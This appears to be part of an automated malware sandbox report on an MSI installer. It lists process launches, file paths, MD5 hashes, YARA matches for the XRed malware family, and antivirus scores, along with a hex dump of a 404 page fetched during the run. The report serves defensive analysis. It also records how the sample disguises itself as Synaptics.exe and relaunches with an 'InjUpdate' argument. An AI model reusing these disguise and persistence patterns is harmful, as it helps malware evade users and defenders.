                                                                                                                                        2024-12-30 10:46:50 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 46 56 32 37 67 6e 57 68 4f 55 42 52 53 58 76 71 67 54 4c 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="xFV27gnWhOUBRSXvqgTLbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:50 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Click to jump to process

                                                                                                                                        Click to jump to process

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Click to jump to process

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:05:46:12
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\valyzt.msi"
                                                                                                                                        Imagebase:0x7ff6fc440000
                                                                                                                                        File size:69'632 bytes
                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:1
                                                                                                                                        Start time:05:46:12
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                        Imagebase:0x7ff6fc440000
                                                                                                                                        File size:69'632 bytes
                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:3
                                                                                                                                        Start time:05:46:13
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\Windows\Installer\MSI4755.tmp
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\Installer\MSI4755.tmp"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:1'723'904 bytes
                                                                                                                                        MD5 hash:71386F37F17778126296CA734975DB6D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSI4755.tmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSI4755.tmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:05:46:14
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:771'584 bytes
                                                                                                                                        MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:05:46:15
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                        Imagebase:0xf90000
                                                                                                                                        File size:53'161'064 bytes
                                                                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:8
                                                                                                                                        Start time:05:46:24
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:771'584 bytes
                                                                                                                                        MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:05:46:41
                                                                                                                                        Start date:30/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 3156
                                                                                                                                        Imagebase:0xdf0000
                                                                                                                                        File size:483'680 bytes
                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        No disassembly